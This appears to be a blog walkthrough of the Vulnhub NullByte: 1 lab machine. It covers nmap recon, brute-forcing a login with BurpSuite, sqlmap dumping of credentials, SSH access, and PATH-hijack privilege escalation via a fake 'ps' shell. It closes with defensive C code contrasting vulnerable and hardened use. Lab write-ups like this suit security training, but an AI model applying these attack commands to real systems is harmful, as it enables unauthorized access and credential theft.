Vulnhub target machine: NullByte: 1

Introduction

Series: NullByte (1 machine in this series)
Release date: August 1, 2015
Difficulty: Beginner
Running environment: Virtualbox
Goal: Obtain Root permissions
Learning:

  • nmap vulnerability scan scripts
  • Brute force cracking
  • SQL injection
  • Environment variable privilege escalation

Target address: https://www.vulnhub.com/entry/nullbyte-1,126/

Information gathering

netdiscover host discovery

sudo netdiscover -i eth1 -r 192.168.56.0/24

Host information detection
The full port scan shows SSH running on the non-standard port 777.

nmap -p- 192.168.56.109
nmap -p 80,111,777,56412 -A 192.168.56.109
nmap -p 80,111,777,56412 --script=vuln 192.168.56.109


Website detection

Opening the website shows only an image; the image's address can be found in the page source.
Directory brute-forcing turned up nothing of value, so I looked at the image itself first and found a string of characters in its metadata.

wget http://192.168.56.109/main.gif
exiftool main.gif

Trying that string as a path, I found it is a directory on the website, and the page there requires a password to log in.

Brute force cracking

Brute-force the password with BurpSuite. rockyou would be the natural dictionary, but it is too large for this, so I used \SecLists-2023.1\Passwords\Leaked-Databases\rockyou-70.txt from SecLists instead. The cracked password is:
elite

SQL injection

After logging in, the search page turns out to be SQL-injectable. Since the request carries no cookie, there is nothing special to handle: just run sqlmap against the URL.

sqlmap -u "http://192.168.56.109/kzMb5nVYJw/420search.php?usrtosearch=1" --dbs
sqlmap -u "http://192.168.56.109/kzMb5nVYJw/420search.php?usrtosearch=1" -D seth --tables
sqlmap -u "http://192.168.56.109/kzMb5nVYJw/420search.php?usrtosearch=1" -D seth -T users --columns
sqlmap -u "http://192.168.56.109/kzMb5nVYJw/420search.php?usrtosearch=1" -D seth -T users --dump

The dumped password string could not be cracked directly. After some experimenting, I found it is base64-encoded; decoding it and then cracking the result gives the plaintext: omega

SSH login

Log in over SSH on port 777 with the account and password recovered from the database dump.

Privilege escalation

From the shell command history, a suspicious executable was easily found. Running it shows that it invokes other programs, which it looks up through the PATH environment variable.

Way 1

Open a second terminal and tamper with the environment variables

./procwatch
cp /bin/sh /tmp/ps
echo $PATH
export PATH=/tmp:/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games
./procwatch


Way 2

Create a new terminal locally and modify the environment variables

echo "/bin/sh" > ps
chmod 777 ps
echo $PATH
export PATH=.:$PATH
echo $PATH
./procwatch
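The pattern both methods abuse, as an added example that is not from the original post or from the NullByte machine: a SUID-style program running "ps" through the caller's PATH, next to a hardened version, plus a check that flags PATH entries an unprivileged user could control (the function names and the /bin/ps location are assumptions).

```c
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/wait.h>

/* Returns 1 if a PATH value contains an entry an unprivileged user could
 * control: an empty entry or "." (both mean the current directory), any
 * relative entry, or anything under /tmp. Both escalation methods above
 * rely on exactly such an entry being searched before /bin. */
int path_has_untrusted_entry(const char *path) {
    const char *p = path;
    for (;;) {
        const char *colon = strchr(p, ':');
        size_t len = colon ? (size_t)(colon - p) : strlen(p);
        int under_tmp = len >= 4 && strncmp(p, "/tmp", 4) == 0 &&
                        (len == 4 || p[4] == '/');
        if (len == 0 || p[0] != '/' || under_tmp)
            return 1;
        if (colon == NULL)
            return 0;
        p = colon + 1;
    }
}

/* VULNERABLE (the procwatch pattern): "ps" is resolved through whatever PATH
 * the caller set, and system() hands the caller's whole environment to /bin/sh. */
int run_ps_vulnerable(void) {
    return system("ps");
}

/* Hardened: absolute path, a fixed minimal environment, no shell in between,
 * and privileges dropped first (a no-op when the binary is not SUID). */
int run_ps_hardened(void) {
    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        if (setgid(getgid()) != 0 || setuid(getuid()) != 0)
            _exit(126);
        char *const argv[] = { "/bin/ps", NULL };
        char *const envp[] = { "PATH=/usr/bin:/bin", NULL };
        execve("/bin/ps", argv, envp);   /* returns only on failure */
        _exit(127);
    }
    int status;
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}
```

The two PATH values set in Way 1 and Way 2 are both flagged by path_has_untrusted_entry, while the machine's original PATH is not.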



Origin blog.csdn.net/weixin_44288604/article/details/132410213